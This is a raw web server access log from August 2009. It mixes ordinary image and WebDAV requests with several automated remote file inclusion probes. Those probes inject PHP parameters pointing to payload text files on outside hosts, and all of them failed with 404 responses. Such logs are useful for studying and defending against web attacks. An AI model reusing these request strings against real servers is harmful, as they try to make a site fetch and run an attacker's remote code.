201.232.127.61 - - [05/Aug/2009:08:43:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
201.232.127.61 - - [05/Aug/2009:08:43:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
79.23.191.23 - - [05/Aug/2009:08:44:06 -0400] "GET /logs/access_log.Q109071600%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.88 - - [05/Aug/2009:08:44:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:44:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:44:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
63.147.72.145 - - [05/Aug/2009:08:45:06 -0400] "GET /logs/error_log.Q109062900/scanhttp://droneh.altervista.org//r0x-id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
217.67.239.230 - - [05/Aug/2009:08:45:12 -0400] "GET /phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.813"
89.108.88.84 - - [05/Aug/2009:08:45:35 -0400] "GET /phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
172.16.1.70 - - [05/Aug/2009:08:45:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:45:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:45:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.189.39.159 - - [05/Aug/2009:08:45:36 -0400] "GET //outlogin.php/?_zb_path=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.189.39.159 - - [05/Aug/2009:08:45:36 -0400] "GET /logs//outlogin.php/?_zb_path=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
